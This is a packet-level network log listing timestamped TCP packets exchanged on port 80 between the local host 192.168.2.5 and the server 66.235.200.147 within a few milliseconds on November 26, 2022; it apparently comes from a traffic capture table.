Nov 26, 2022 11:17:40.087519884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087523937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087547064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087567091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087568998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087609053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087609053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087632895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087652922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087673903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087675095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087697983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087712049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087723017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087744951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087763071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087769032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087791920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087810040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087816954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087846041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087862015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087869883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087893009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087907076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087918043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087939978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087956905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087965012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087985992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088004112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088087082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088104010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088120937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088135958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088145971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088162899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088171959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088195086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088215113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088217020 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088238955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088252068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088263988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088284016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088301897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088304996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088326931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088341951 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088350058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088388920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088407040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088427067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088444948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088463068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088468075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088490009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088509083 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088512897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088553905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088596106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088613987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088632107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088649035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088661909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088674068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088692904 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088701010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088722944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088743925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088745117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088768005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088784933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088793039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088814974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088835955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088835955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088862896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088881016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088887930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088910103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088928938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088934898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088953972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.088968992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.088980913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089000940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089020014 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.089020967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089042902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089060068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.089065075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089087963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089104891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.089109898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089131117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089148045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.089153051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089175940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089190960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.089199066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089220047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089237928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.089243889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089266062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089283943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.089287043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089308977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089328051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.089330912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089376926 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.089390039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089410067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089426994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089445114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089462996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.089467049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089489937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089493036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.089514017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089531898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089549065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089569092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089570045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.089612007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.089654922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089673042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089689016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089706898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089725971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089741945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089760065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089781046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089798927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089818001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089835882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089853048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089870930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089888096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089910984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.089925051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089939117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.089950085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089971066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.089989901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090007067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090023994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090040922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090058088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090069056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.090081930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090084076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.090105057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090106010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.090127945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090145111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090162039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090178013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090193987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.090198994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090217113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.090223074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090244055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090262890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090271950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.090287924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090301991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.090312958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090332985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090349913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090367079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090384007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090399981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090418100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090434074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090447903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.090472937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.090579987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090598106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090615988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090632915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090650082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090658903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.090676069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090692997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.090699911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090720892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090739965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090759039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090775967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090790033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.090799093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090818882 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.090822935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090843916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090861082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090913057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.090914011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090913057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.090938091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090958118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090976954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.090995073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091012955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091029882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091048002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091067076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091084957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091101885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091111898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.091128111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091135979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.091152906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091171026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.091176033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091198921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091217041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091228008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.091243029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091262102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091279984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091285944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.091305017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091310978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.091329098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091347933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091367960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091371059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.091392994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091396093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.091418028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091435909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091454983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091471910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091490030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091506958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091525078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091542959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091558933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091576099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091593027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.091600895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091634035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.091717005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091736078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091754913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091773987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091794014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091811895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091831923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091850996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091869116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091881037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.091895103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091917038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091933012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.091942072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091965914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.091968060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.091990948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092011929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092019081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.092046022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092066050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.092067957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092093945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092114925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092133999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092164040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092186928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092204094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092221022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092242002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092248917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.092268944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092272997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.092287064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.092294931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092315912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092334986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092353106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092370033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092387915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092406034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092425108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092442989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092461109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092473984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.092485905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092502117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.092509985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092530012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092549086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092566013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092631102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.092725039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092742920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092761993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092781067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092797995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092816114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092833996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092852116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092869997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092888117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092905045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092935085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092952013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092968941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.092988014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093005896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093023062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093040943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093058109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093075037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093091965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093107939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093127012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093146086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093151093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.093169928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093170881 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.093188047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.093194962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093215942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093234062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093250990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093260050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.093276024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093285084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.093301058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093321085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093323946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.093343973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093362093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.093365908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093385935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093405008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.093406916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093427896 CET	80	49707	66.235.200.147	192.168.2.5
